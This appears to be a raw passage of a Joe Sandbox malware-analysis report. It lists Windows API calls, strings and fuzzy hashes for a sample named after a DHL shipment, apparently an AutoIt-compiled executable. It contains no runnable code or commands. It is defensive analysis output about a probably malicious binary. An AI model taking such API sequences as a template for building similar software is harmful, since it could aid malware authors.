                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: 5901669fe18cb14ee97428dc269ef42d21fd9d5e5334ca2156c4c0b24a7fa4cb
                                                                                      • Instruction ID: f0006c57c254f69ef66b9ad8fc901decf2579adf7cded3e3663ba1056c8e0d9d
                                                                                      • Opcode Fuzzy Hash: 5901669fe18cb14ee97428dc269ef42d21fd9d5e5334ca2156c4c0b24a7fa4cb
                                                                                      • Instruction Fuzzy Hash: 2EB17B35A00209EFDF14DF69DC49BEA3BB5FB48314F158229FA16A7290DB30E841CB61
                                                                                      APIs
                                                                                        • Part of subcall function 00E010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01114
                                                                                        • Part of subcall function 00E010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01120
                                                                                        • Part of subcall function 00E010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E0112F
                                                                                        • Part of subcall function 00E010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E00B9B,?,?,?), ref: 00E01136
                                                                                        • Part of subcall function 00E010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E0114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E00DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E00E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E00E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E00E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E00E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E00EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E00EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E00EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E00EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00E00EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E00F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E00F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E00F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E00F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00E00FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E00FA8
                                                                                        • Part of subcall function 00E01193: GetProcessHeap.KERNEL32(00000008,00E00BB1,?,00000000,?,00E00BB1,?), ref: 00E011A1
                                                                                        • Part of subcall function 00E01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E00BB1,?), ref: 00E011A8
                                                                                        • Part of subcall function 00E01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E00BB1,?), ref: 00E011B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: e0cfd281eaf3003df3c8d1c14e9c023e6275935d23c689facba1671a825f7234
                                                                                      • Instruction ID: 992f06df5cadb37eabe05ca1b1439cdcd9223bad4ec4ae191c19484a1f9b5e1d
                                                                                      • Opcode Fuzzy Hash: e0cfd281eaf3003df3c8d1c14e9c023e6275935d23c689facba1671a825f7234
                                                                                      • Instruction Fuzzy Hash: 5F716A72A0020AAFDF209FA5DC48FAEBBB8FF05305F144115FA59B6191D731DA89DB60
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E3CC08,00000000,?,00000000,?,?), ref: 00E2C544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00E2C5A4
                                                                                      • _wcslen.LIBCMT ref: 00E2C5F4
                                                                                      • _wcslen.LIBCMT ref: 00E2C66F
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00E2C6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00E2C7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00E2C84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E2C881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E2C88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00E2C960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 9721498-966354055
                                                                                      • Opcode ID: 63329808059e1cd5aa7631bdc2697dfb440b4ec78a62a2b9c2d3dc5aa00e4976
                                                                                      • Instruction ID: c940b82e4559dfe964feeafbe99f20e883187023c53e43d2c4150f8e3cdaa327
                                                                                      • Opcode Fuzzy Hash: 63329808059e1cd5aa7631bdc2697dfb440b4ec78a62a2b9c2d3dc5aa00e4976
                                                                                      • Instruction Fuzzy Hash: EB127A356042119FC718DF24D891A2AB7E5FF89714F14885DF88AAB3A2DB31FC41CBA1
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E309C6
                                                                                      • _wcslen.LIBCMT ref: 00E30A01
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E30A54
                                                                                      • _wcslen.LIBCMT ref: 00E30A8A
                                                                                      • _wcslen.LIBCMT ref: 00E30B06
                                                                                      • _wcslen.LIBCMT ref: 00E30B81
                                                                                        • Part of subcall function 00DBF9F2: _wcslen.LIBCMT ref: 00DBF9FD
                                                                                        • Part of subcall function 00E02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E02BFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 1103490817-4258414348
                                                                                      • Opcode ID: 046d1818a792fea29eabeb9b364c30ac2f81ab5fa32e3316fd35b32bb6e23149
                                                                                      • Instruction ID: 6a2f88288510429a009f41c1ad233b05f43597f8d787c772625f19951ef4e3ba
                                                                                      • Opcode Fuzzy Hash: 046d1818a792fea29eabeb9b364c30ac2f81ab5fa32e3316fd35b32bb6e23149
                                                                                      • Instruction Fuzzy Hash: C8E1BC312083018FCB14EF24C46496ABBE1FF99358F10995CF896AB3A2D731ED45CBA1
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 1256254125-909552448
                                                                                      • Opcode ID: 897a48d6ca0da2299752bc7d6f18cf4752c7ab979cc8dbbcca9b34c0451c1106
                                                                                      • Instruction ID: 67e46c505cc41b9b6a1bf5c799d15846e5ff4837ee8d1c389734beaca6c70413
                                                                                      • Opcode Fuzzy Hash: 897a48d6ca0da2299752bc7d6f18cf4752c7ab979cc8dbbcca9b34c0451c1106
                                                                                      • Instruction Fuzzy Hash: 5271077260053A8BCB20DE7CED525FE3391AFA1798B352528F856B7284EA71DD44C7B0
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00E3835A
                                                                                      • _wcslen.LIBCMT ref: 00E3836E
                                                                                      • _wcslen.LIBCMT ref: 00E38391
                                                                                      • _wcslen.LIBCMT ref: 00E383B4
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E383F2
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E3361A,?), ref: 00E3844E
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38487
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E384CA
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E38501
                                                                                      • FreeLibrary.KERNEL32(?), ref: 00E3850D
                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3851D
                                                                                      • DestroyIcon.USER32(?), ref: 00E3852C
                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E38549
                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E38555
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                      • String ID: .dll$.exe$.icl
                                                                                      • API String ID: 799131459-1154884017
                                                                                      • Opcode ID: 391aaf5d7ed19a71e61037cc3129e6ca94264e71c9061f8f4498305070929411
                                                                                      • Instruction ID: 24a9b21b497eed4babd8e7c499cef5c9224a78ac7577802a330187a56d5149a9
                                                                                      • Opcode Fuzzy Hash: 391aaf5d7ed19a71e61037cc3129e6ca94264e71c9061f8f4498305070929411
                                                                                      • Instruction Fuzzy Hash: C861DE71540319BEEB149F64CD49BBE7BA8EB08B20F105609F815F61D1DB74A984CBA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                      • API String ID: 0-1645009161
                                                                                      • Opcode ID: b68e5f3b35d354a08bfc837ecb7d2fe7e6d628d49f3be5e7d618c30a5d0df196
                                                                                      • Instruction ID: f8c1b6ba441ac34b758699fdd541fbb18b4066f03c467a9da968b5dbc6468842
                                                                                      • Opcode Fuzzy Hash: b68e5f3b35d354a08bfc837ecb7d2fe7e6d628d49f3be5e7d618c30a5d0df196
                                                                                      • Instruction Fuzzy Hash: F1810571A44706BBDB20BF61DC42FAE7BA8EF16340F084424F905AB196EB71DA11D7B1
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00E05A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E05A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00E05A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E05A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E05A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E05A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E05A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E05AA9
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E05AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00E05ACC
                                                                                      • _wcslen.LIBCMT ref: 00E05B33
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00E05B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00E05B75
                                                                                      • GetWindowRect.USER32(00000000), ref: 00E05B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E05BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00E05BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E05C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E05C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 895679908-0
                                                                                      • Opcode ID: d4d84140b94efcda2a7453f5021e700d34d3bead616d1c35cef45be2df083b0a
                                                                                      • Instruction ID: 91dcf5ef5acec5455deac1194a04495e97b2f52d3a42a7a0f2a2f85c424a16ce
                                                                                      • Opcode Fuzzy Hash: d4d84140b94efcda2a7453f5021e700d34d3bead616d1c35cef45be2df083b0a
                                                                                      • Instruction Fuzzy Hash: 52713C32900B09AFDB20DFA9CE89AAFBBF5FB48704F105519E542B25A0D775E984CF50
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                                                      • API String ID: 176396367-1901692981
                                                                                      • Opcode ID: d32d56ffa2b6785b121699373356cdde5d15db7119bd0628b529b05cc2ad6654
                                                                                      • Instruction ID: ea53d03c21563dfcfa39e11d36f5004dd9120ca0ea0048bcdbc351ab1408c360
                                                                                      • Opcode Fuzzy Hash: d32d56ffa2b6785b121699373356cdde5d15db7119bd0628b529b05cc2ad6654
                                                                                      • Instruction Fuzzy Hash: D0E10832A005169BCB189FB8C8517EDFBB8FF44754F54A119E466B7290DB30AEC5CBA0
                                                                                      APIs
                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00DC00C6
                                                                                        • Part of subcall function 00DC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E7070C,00000FA0,5D7FE8E3,?,?,?,?,00DE23B3,000000FF), ref: 00DC011C
                                                                                        • Part of subcall function 00DC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DE23B3,000000FF), ref: 00DC0127
                                                                                        • Part of subcall function 00DC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DE23B3,000000FF), ref: 00DC0138
                                                                                        • Part of subcall function 00DC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00DC014E
                                                                                        • Part of subcall function 00DC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DC015C
                                                                                        • Part of subcall function 00DC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DC016A
                                                                                        • Part of subcall function 00DC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC0195
                                                                                        • Part of subcall function 00DC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00DC01A0
                                                                                      • ___scrt_fastfail.LIBCMT ref: 00DC00E7
                                                                                        • Part of subcall function 00DC00A3: __onexit.LIBCMT ref: 00DC00A9
                                                                                      Strings
                                                                                      • InitializeConditionVariable, xrefs: 00DC0148
                                                                                      • kernel32.dll, xrefs: 00DC0133
                                                                                      • WakeAllConditionVariable, xrefs: 00DC0162
                                                                                      • SleepConditionVariableCS, xrefs: 00DC0154
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DC0122
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                      • API String ID: 66158676-1714406822
                                                                                      • Opcode ID: 43467ee80342c5c1770ee55c82a2abedb3faedb1436d975da11acbc616722923
                                                                                      • Instruction ID: e89803d181e149157b39dfb3b0b9803348d81cc48e3864cadcb590da0e6fd2b4
                                                                                      • Opcode Fuzzy Hash: 43467ee80342c5c1770ee55c82a2abedb3faedb1436d975da11acbc616722923
                                                                                      • Instruction Fuzzy Hash: DA21F932A45716EFD7116BA5AC0DF6A7FA4DB04B51F28012EF905F3291DBB0DC048AB0
                                                                                      APIs
                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00E3CC08), ref: 00E14527
                                                                                      • _wcslen.LIBCMT ref: 00E1453B
                                                                                      • _wcslen.LIBCMT ref: 00E14599
                                                                                      • _wcslen.LIBCMT ref: 00E145F4
                                                                                      • _wcslen.LIBCMT ref: 00E1463F
                                                                                      • _wcslen.LIBCMT ref: 00E146A7
                                                                                        • Part of subcall function 00DBF9F2: _wcslen.LIBCMT ref: 00DBF9FD
                                                                                      • GetDriveTypeW.KERNEL32(?,00E66BF0,00000061), ref: 00E14743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                      • API String ID: 2055661098-1000479233
                                                                                      • Opcode ID: 053a11b71ee0fdf70b530cadf50064f035ec3f445298350e01dee464323ca174
                                                                                      • Instruction ID: e5a3479feae986c62719b07488d4a164fe90a95aba225c27225f4764c0a2a6ff
                                                                                      • Opcode Fuzzy Hash: 053a11b71ee0fdf70b530cadf50064f035ec3f445298350e01dee464323ca174
                                                                                      • Instruction Fuzzy Hash: 1AB1D3B16083029FC710DF28C890AAAB7E5EF96768F50591DF496E73D1D730D984CB62
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00E39147
                                                                                        • Part of subcall function 00E37674: ClientToScreen.USER32(?,?), ref: 00E3769A
                                                                                        • Part of subcall function 00E37674: GetWindowRect.USER32(?,?), ref: 00E37710
                                                                                        • Part of subcall function 00E37674: PtInRect.USER32(?,?,00E38B89), ref: 00E37720
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E391B0
                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E391BB
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E391DE
                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E39225
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E3923E
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E39255
                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00E39277
                                                                                      • DragFinish.SHELL32(?), ref: 00E3927E
                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E39371
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                                                      • API String ID: 221274066-136824727
                                                                                      • Opcode ID: 7957e622e6d1e7f4399e11d630e0423ac5c2d66d6f4dc66ab14950b6887e123a
                                                                                      • Instruction ID: d8c9d0168f42aadd0f60f2b88b2fc16454516542db8360b38aad40d3263b85ee
                                                                                      • Opcode Fuzzy Hash: 7957e622e6d1e7f4399e11d630e0423ac5c2d66d6f4dc66ab14950b6887e123a
                                                                                      • Instruction Fuzzy Hash: 38618971108301AFC701EF65DC89DAFBBE8EF89750F101A1DF595A22A1DB70DA49CB62
                                                                                      APIs
